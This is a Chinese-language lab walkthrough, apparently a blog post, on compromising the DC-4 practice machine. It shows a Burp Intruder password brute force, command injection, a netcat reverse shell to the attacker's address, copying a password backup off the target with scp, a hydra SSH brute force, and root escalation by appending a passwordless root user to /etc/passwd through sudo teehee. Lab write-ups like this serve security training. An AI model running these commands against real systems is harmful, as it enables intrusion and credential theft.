DC系列靶场---DC 4靶场的渗透测试

DC-4靶场渗透测试

信息收集

地址探测

使用arp-scan进行地址探测

arp-scan -l -I eth0

Nmap扫描

nmap -sS -sV -T4 -p- -o 172.30.1.131

目标主机开启了80端口、22端口。我们可以访问一下

http探测

暴力破解

使用Burp suite

猜解用户名为admin,密码随便写。

通过Burp suite抓包看到我们输入的参数,下面使用重放模块进行爆破。

把数据包发送到intruder模块中,快捷键ctrl+l。

选择攻击类型,这里有四种攻击类型

【sinper】狙击手:对单一参数进行密码爆破

【battering ram】撞锤:对所有参数进行同一个变量爆破(如用户名和密码一样)

【pitchfork】鱼叉:对所有参数进行一一对应爆破,传递两个参数两个字典,一一对应。

【cluster bomb】集束炸弹:对参数进行交叉爆破,常用用于不知道账号密码的情况

这里使用第一种攻击狙击手,对单一参数进行爆破

选中密码,点击add添加变量。

设置payloads

Payload set我们只对密码进行爆破所以这选择1

Payload type这里我们使用字典文件所以选择Payload type

如果是社区版的Burp suite现在就可以进行攻击

专业版是可以指定攻击的线程的,我这里指定的100,好像社区版线程是10吧。

点击Start attack开始攻击。

因为我使用的字典文件很大,我们这时候可以根据长度来分辨哪个是密码,因为正确密码只有一个,我们可以点length来区分真密码,我们看到密码是happy

用户名:admin

密码:happy

输入账号密码我们就登进了(可能因为靶机原因,如果等不进去,再输入一次就可以)

这里我们看到一个command,这个不就是命令的意思嘛。初步确定存在命令注入漏洞

username:admin
password:happy

漏洞探测及利用

命令注入

这里给我们提供了三个命令,都是可以执行的。

那我们是不是就可以使用Burp suite 进行拦截修改命令。

打开Burp suite的拦截功能,去网站执行三个命令哪个都可以。

这里看到最后一行ls -l 那我们修改看看账户文件。

输入查看账户文件的命令,发送到Repeater模块,点击send发送

cat /etc/passwd

拦截修改后是可以执行的,既然这样我们就直接去获取shell

利用nc获取shell

攻击端做监听,监听4444端口等待连接

nc -lnvp 4444

被攻击端主动连接我们的攻击端

nc -nv 172.30.1.20 4444 -c /bin/bash

这时候已经拿到目标主机的shell了

利用python获取交互式shell

python -c 'import pty;pty.spawn("/bin/bash")'

拿到shell之后我们要做信息收集

信息收集

先看一下账户文件

 cat /etc/passwd

看到这里有三个用户jim、sam、charles。

可以去看一下这三个用户下有什么文件

ls -l /home/jim

Charles、sam用户下面并没有什么东西,但是jim用户下面有个密码备份文件,那我们就可以使用这个密码备份文件进行爆破。

使用scp把这个文件传输到我们的kali上,因为这是通过ssh传输的,所以要确定kali开启了ssh服务。

scp /home/jim/backups/old-passwords.bak root@172.30.1.20:~

使用hydra进行爆破

hydra -L dc-4-user.txt -P dc-4-pass2.txt 192.168.195.142 ssh

用户名:jim

密码:jibril04

su - jim

看看邮箱有没有东西

用户邮箱的位置:/var/mail/用户名 或/var/spool/mail/用户名

cat /var/mail/jim

来自charles发来的一封邮件,我们看到这封邮件中有个密码。

那我们就登录一下吧

su - charles

已经登陆成功了。

提权

信息收集

列出所有可以以root执行的命令

sudo -l

可以看到使用teehee提权,teehee就是tee的变体从标准输入读取并写入标准输出和文件我们可以借助teehee往passwd写入一个root账号即可得到root权限查看一下这个命令的帮助手册,使用-a参数在/etc/passwd文件里面新建一个有管理员权限的用户

teehee提权

我们要先了解账户文件的格式

echo 'xiaofeixia::0:0::/root:/bin/bash' | sudo teehee -a /etc/passwd

写入之后我们直接登录,因为我们没有设置密码,登录的时候不用输入密码。

su - xiaofeixia

cat flag.txt

总结

1、在使用Burp suite进行暴力破解时,要熟悉工具中的模块,及攻击的四种类型,这样可以大大提高效率

2、Burp suite进行攻击时可以根据长度来快速找到密码,因为正确的密码只有一个。

3、无论是拿到shell之前还是拿到shell之后都要先进行信息收集,收集到的信息越多,我们的攻击面就更多

4、在做提权没有思路的时候,我们还是要进行信息收集,通过信息收集获得更多提权的方式。

  • 23
    点赞
  • 20
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

白帽子二三

您的鼓励是我最大的前进动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值